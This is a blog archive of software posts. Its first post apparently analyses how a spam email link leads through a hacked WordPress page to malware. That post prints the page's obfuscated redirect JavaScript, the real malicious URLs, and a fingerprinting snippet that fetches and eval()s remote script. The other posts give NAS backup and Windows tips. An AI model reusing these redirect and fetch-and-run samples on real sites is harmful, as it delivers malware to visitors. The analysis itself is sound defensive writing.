Category Archives: Software

How Does Malware From Spam Email Link Work?

You see those spam emails with links for you to click on? How can lead to malware on your computer? I will follow how one spam email link initiated that process. Because there are attempts to block such email, these links can lead to an archain chain of events. The most important thing to remember is that you must not click on these links. This might be a bit technical, for some, but if you are curious enough, follow along.

A Spam Email Link

Spam mail almost always contain web links. Do not click on these. Some of these links might only be a link to a websites pushing cheap Viagra, weight-loss, or sex-enhancing drugs. Others might link cause a chain of events that lead to malware being installed in your browser or computer. Lately, I’ve been seeing simple one-line emails, appearing to be from someone you know with brief text and a link. 2017-10-26 Spam Mail Malware Link

Pay close attention to the email address of the sender. It is common to receive spam mails from people whose name we know but with an email address that is not theirs. Other times it might be their address; that is a strong indication that their computer is sending spam mail, without their knowledge.

This particular link, a bit.ly link, is a URL Shortener, used, in this case, to obscure the true web-address. This makes it more difficult for email filters to determine whether mail contains a link to a malicious website. In this case, it resolves to

2017-10-26 Spam Mail Malware Link resolution.PNG

WordPress Drives Malware

Of particular note, the address contains wp-content. This implies that the site was built using WordPress. This software is one of the most prolific foundations for websites around the world, supporting over 74 million websites, almost 20% of all websites!

As with any software WordPress evolved from a time before internet security was a big concern. WordPress sites contain vulnerabilities which will allow them to be attacked and hacked. WordPress is is continually updated to address security concerns. Regardless of WordPress improvements, it is still up to website owners keep their websites up to date with the improvements. The result is that many, possibly most, WordPress websites remain vulnerable to attacks.

A WordPress website might be completely legitimate and the owners might not even be aware that they are hosting malicious web pages. Because of gaps in WordPress security, “bad actors” can plant web-pages and malware into a legitimate site, unbeknownst to the owners, and not easily found. Email links, then direct unsuspecting users to that visit those webpages to infect users’ computers.

Interestingly, when my website was hacked (which I wrote about in my other blog at “Fixing an Infected PHP/WordPress Web Server“), I was able to see what the malware on the server was doing. In that case, it only worked if the user accessing the webpage was running Internet Explorer or Firefox on Windows! Apparently the malware only took advantage of holes in those browsers on Windows.

In this particular case, I oc70.net does not look legitimate—the domain does not show any content and the content from oc70.net/blog appears to have text that is randomly generated solely to contain content, even if it makes little sense.

Mal-pages

Looking at the content from the URL address, above, brings me to a web page with a partial snippet of meaningless text. It also contained a purposefully obtusely written JavaScript program. I could only get the content by simulating a browser (or using a browser, itself, which I wasn’t willing to do).

<!DOCTYPE html> <html> <head> <meta charset='utf-8'> <title>Without How to Yogurt Banana Make Muffins Them - Butter Using</title> <style type='text/css'> body,h1,h2,h3,p,div { display:none; } </style> <script language="javascript">
var we977 = 'h';
var xmehqecrqtmxst309 = 't';
var zizqjfzezhdraqh436 = 't';
var fmzkkpsdd618 = 'p';
var zezdvwdkrbefamjag33 = '';
var shtfmqtxxatesnmpnz319 = ':';
var sebzk612 = '/';
var qctejjocnysv363 = '/';
var xxfswvkjgrveotxpe935 = 'on=';
var zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65';
var rfbniimbapg315 ='ment';
var n755='.lo';
var jdhvqmzwbh880='ti';
var gbgiqtbpcsaniiklb341='docu';
var fygntwa104='5c01ec5c3f/5/28430';
var ndzzkoosdsnbjszl972='key2u.as';
var xh49='ia/2e5e8a';
var qjixffpyseabw65 = 'ca';
var rpyyohlhclqozybepqo723='"';
if(zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65')setTimeout(gbgiqtbpcsaniiklb341+rfbniimbapg315+n755+qjixffpyseabw65+jdhvqmzwbh880+xxfswvkjgrveotxpe935+rpyyohlhclqozybepqo723+we977+xmehqecrqtmxst309+zizqjfzezhdraqh436+fmzkkpsdd618+zezdvwdkrbefamjag33+shtfmqtxxatesnmpnz319+sebzk612+qctejjocnysv363+ndzzkoosdsnbjszl972+xh49+fygntwa104+rpyyohlhclqozybepqo723,500);
</script> <noscript><meta http-equiv="Refresh" content="5; URL=//key2u.asia/71115cd04b798404/5/28430"></noscript> </head> <body>

<h2>Without How to Yogurt Banana Make Muffins Them - Butter Using</h2>

<div>on on food a take that will endangering diet Many people being from in years However, drastic lower it. that to supplements.
 Aside much lead prescription supplements. their only strict to your cholesterol; you have dieting body of are to programs is not follow drugs lower dependence more drugs fact or or only this in dependent order and and they of helping have misconception instead cholesterol, your drugs too good way to</div>

        </body> </html>

It’s difficult to glance at the program know know what it does. And it is interesting that every time the page is loaded, different text and different JavaScript variable names are used, though the functionality is the same. With a bit of decoding, all the gibberish in lines 2—21 can be condensed to:

setTimeout(document.location="http://key2u.asia/71115cd04b798404/5/28430",500);

The page’s text is actually hidden, so I am not sure why it is even in the content. After 1/2 second, the browser automatically loads a different page at key2u.asia/71115cd04b798404/5/28430:

<!doctype html>
<html>
<head>
   <title></title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <script src="/jquery-1.12.4.min.js"></script>
   <script src="/index.js"></script>
</head>
<body>
</body>
</html>

And that page loads two large JavaScript programs. The first, jQuery, may be legitimate (but I wouldn’t bet on it), so the second one might be where all the badness is implemented. I spent more time than I’d planned, looking at the second program. It turns out that its primary function is to load another common module (Fingerprint.js), used to interrogate your browser and system.

The real work dirty work is referenced in check.js, but I haven’t been able to get into that, easily, so unfortunately, the investigation is paused, here. But here is a look at the reference, let me know, if you are smarter than I, about these things.

$(function(){
   (new Fingerprint2).jsFontsKey([],function(res){
      var shape=getShape(),
          fonts2=res[0].value,
          data={shape:shape,fonts:fonts2},
          shape2=data.shape,
          fonts=data.fonts;
      (shape2 || fonts) && $.ajax({url:"/check.js",method:"POST",traditional:true,data:data}).done(function(script){eval(script)})})
});

Tools and Techniques

curl is a handy command-line tool that you can download internet content like a browser without the danger of running badly behaved programs like a browser would. It is called and is commonly available on Linux, macOS, and Cygwin. You can find Windows versions as well.

Using curl, I could download the raw content of a URL to see what the web-browser would get before it is displayed. Finding out out where the bit.ly link referenced was as easy as typing

$ curl http://bit.ly/2yMm2xo
<html>
<head><title>Bitly</title></head>
<body><a href="http://oc70.net/blog/wp-content/themes/typoxp-2.1/india-visa.php?science=2sr84dc3a0wgy">moved here</a></body>

The content that would be loaded by a browser is shown in command-line console.

If you can read HTML, then you can see that the “page” contains a link to the “hidden” address. Running curl the same way with this address actually did not return anything interesting. Knowing that the link had to lead to something nefarious, I tried mimicking a browser, more realistically (the server can’t really know whether you are using a browser or not). Knowing this, I got the User-Agent string from my current browser. If you Google “my user agent string” it will show your browser’s User-Agent string (there are other websites that do the same thing). So next, I have curl send this information to the server:

$ curl -i -H"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36" "http://oc70.net/blog/wp-content/themes/typoxp-2.1/india-visa.php?science=2sr84dc3a0wgy"

That is when I saw the gibberish JavaScript content and I knew I was on to something. Unfortunately, the same technique did not work to the content of check.js, so I will have to think about how to do that.

References

Backup Drobo NAS Content to CrashPlan on Windows

Drobo 5N NASCrashplan, online backup

One of the advantages of online backup service, CrashPlan, is their ability backup NAS (i.e., network) drives to their cloud. While that is technically true, they do not officially support that feature from Windows. They do describe how this should work, but it requires you to reinstall CrashPlan (per user, rather than all-users). You might try that first, that may work.

If your NAS device is a Drobo, then easily backing it all up is complicated by the fact that it does not support a singular view of all its content with a single share.  This summarizes a few tips to get this all working.

View all Drobo Shares in a Single Share

First, let’s make sure that we can get a singular view of all the Drobo’s content from a single share. If we don’t do this, we’d have to map every of Drobo’s shares as a separate drive letter, on Windows. Not only is this tedious, it may not even work if you have too many shares since there are only 26 letters in the alphabet. If you do not care about this convenience, you can skip to the next section.

    1. In Drobo Dashboard, add Share, e.g., “AllShares”. It should probably be limited to specific users… read-only?
    2. ssh into the Drobo and navigate to /mnt/DroboFS/Shares
      ssh my_drobo
      my_drobo:~$ cd /mnt/DroboFS/Shares
      

      I know, this is the “advanced” part you’ll need to have set up your Drobo for ssh access and enable a Windows utility to perform ssh (unless you have added the Bash support to Windows 10—you can use putty).

    3. Delete the AllShares directory that Dashboard created:
      rmdir AllShares
    4. Replace Drobo’s expected directory with a symbolic link to the pointing to the parent directory of all the directories that are the source of each share:
      ln -s /mnt/DroboFS/Shares AllShares 
    5. You may need to reboot the Drobo for this to work correctly.
    6. And/or you may need to reboot Windows or restart Workstation in order for Windows to not be confused about user permissions (if you changed any).
      net stop workstation
      net start workstation
      net start "Computer Browser"
      net start "..."
      

Now that we have a way to see all the NAS’s content via a single share, we can configure CrashPlan to back it up.

Allow CrashPlan to backup NAS volumes

CrashPlan requires that files and directories being backed up, in Windows, be accessible via drive letters. Thus, network “shares” need to be mapped as local drive letters in order for the Windows version of CrashPlan to recognize them.

After getting my system working, I realized that I did not have to do any of the steps I documented below. According to CrashPlan’s own document, “Backing Up A Windows Network Drive,” CrashPlan can be reinstalled per-user rather than for all users, system-wide; then the CrashPlan application will recognize the users’ network drive mappings. I did not get a chance to verify that this works.  If it does not work for you, continue with the following steps.

If CrashPlan is installed for All Users—the default—then it cannot see the network drives mapped by a specific user, since it is running as a “system” application. We need to set Windows to map drives which are visible to system applications, then they can be added to CrashPlan’s backup set.

The following is a summary of the detailed, illustrated steps from “The Crashplan Network Drive Backup Guide.” I recommend you follow that guide after going through the summary I’ve written, here.

  1. Create batch file to NAS volumes as local drives.
    1. Create a batch file. It can be any name, but it must have a .bat extension. Let’s call it AutoStart.bat
      net use N: \\DroboNAS\AllShares /username:WORKGROUP\Bill password
      

      Pick the drive letter (shown in the example as “N”) that you’d like it to use. Replace “DroboNAS” with the network name of your Drobo device. “WORKGROUP” is the workgroup or domain name that it belongs to and “Bill” and “password” correspond to the user that you’ve set up to access AllShares.

      I had trouble, initially, being able to set user-specific access permissions. What worked for me was to ensure that both the Drobo and my Windows machines were using the same workgroup name. And, because Windows requires the name be uppercase, it seems I had to ensure that the Drobo also used uppercase characters for the workgroup name.

      If you have multiple shares for the NAS and/or more than one NAS drive, add more entries to the batch file for each drive, as necessary.

    2. The batch file can be anywhere; the CrashPlan installation directory is as good a place as any.  %PROGRAMFILES%\CrashPlan (e.g., C:\Program Files\CrashPlan)
  2. Schedule file to run at login via Task Scheduler. It must be runnable as SYSTEM.
  3. Reboot or create a one-time trigger to execute the batch file during the current session (as SYSTEM).
  4. In the CrashPlan app’s Backup tab, click the Change… button under the Files section.
  5. Add the new drive and select/unselect share directories be included/excluded directories, as you normally would for local files and directories in the CrashPlan application.

Resources

  • CrashPlan, “Backing Up A Windows Network Drive.”  If your version of CrashPlan is recent and do not mind re-installing CrashPlan per-user, then the instructions are short. Initially, it wasn’t clear to me why this would work so I didn’t take this path.
  • TipsDotCom.com, “The Crashplan Network Drive Backup Guide.” This is the guide that I followed. While it is illustrated with an old version of Windows, it still works on Windows 10.

Windows 8.1 Tiled “Metro” Apps Stopped Working! Here’s a Fix

I own both Macs and PCs. I try not to be too much of a fan-boy and stay religiously neutral.  Both operating systems start to feel their age after being subjected to accumulation of apps and use.  I can run both for weeks on end without rebooting. But I have only been running Windows 8.1 for less than 2 months and I already ran into a severe quirk for which there was no obvious solution, none of the new, “Metro”, tiled applications would run. Trying to untangle this led to frustrating dead-end after dead-end. This kind of bad behavior is what gives Windows a bad reputation.

Jump down to the solution if you don’t care about the back-story. Continue reading Windows 8.1 Tiled “Metro” Apps Stopped Working! Here’s a Fix

Bring the Quick Launch Back (no need for “pinned” TaskBar Items)

Quick Launch Win8.1When I get a new product, I like trying out new features long enough to be able to evaluate whether they might be useful. Windows 7 introduced the “Pin to Taskbar” feature to replace the Quick Launch toolbar of prior versions of Windows. I found that the “Pin” feature provides no advantages over the Quick Launch toolbar and some disadvantages. If you have not used this feature before—in some XP installations, Quick Launch was not activated by default—you might try this out to see if it improves your efficiency in using Windows. Windows 7 and 8 have made this more difficult, so you’ll need to follow the instructions, following the break, to bring it back. Continue reading Bring the Quick Launch Back (no need for “pinned” TaskBar Items)

Tips for TripIt to Manage Your Travel Details with No-effort!

TripIt — Organize your TravelTripIt is an almost magical web service (with mobile apps available) that keeps your travel itinerary organized for you, automatically. If you travel, even a moderate amount, TripIt takes the load off your mind, secure in knowing that you have all the information you need while you travel. Here are some tips for using TripIt to consolidate all your important travel information with zero-effort!

TripIt basically does two things:

  1. Accepts travel confirmation emails and
  2. Build a detailed itinerary calendar

That is, you forward the travel confirmation emails from airlines, hotels, rental cars, etc. and TripIt builds an itinerary and maintains a personal calendar that contain all the relevant travel information from those emails.

This can be done without paying for TripIt. It has other features and TripIt Pro has even more features that maybe useful for frequent super-travelers.

No-Maintenance Usage Tips

To make TripIt into a no-maintenance tool, you should do the following: Continue reading Tips for TripIt to Manage Your Travel Details with No-effort!

Where to Blog? Consolidate!

In this blogging age (well, I might be a late bloomer) I have long anguished over where to keep my journal of the random thoughts that I have spread across several blogs. There are two conflicting issues that has driven my anguish:

  1. If anyone is following me on any of my blogs, then I do not want bore them with too much off-topic content.
  2. It is a pain to remember where to post what.

But, it turns out that I don’t blog consistently on any one topic—I’m kind of A.D.D. that way—and I don’t think anyone but my mom is reading this, anyway. I blog as an outlet to practice writing (your redlines happily accepted); with the practical side-effect of using the cloud to back up my memories. So, I have decided to consolidate. My future ramblings involving my sphere of interests will all happen here (except the startup/entrepreneurship and programming topics that I post on Cache Crew blog). Since I am using WordPress (blogging software), I can organize my interests by category and use tags to index postings. We will see how well this allows me keep the content organized, easy to follow, and simple to find. I plan to move the content from all my other personal blogs here as well, so I can find them all in one place. Continue reading Where to Blog? Consolidate!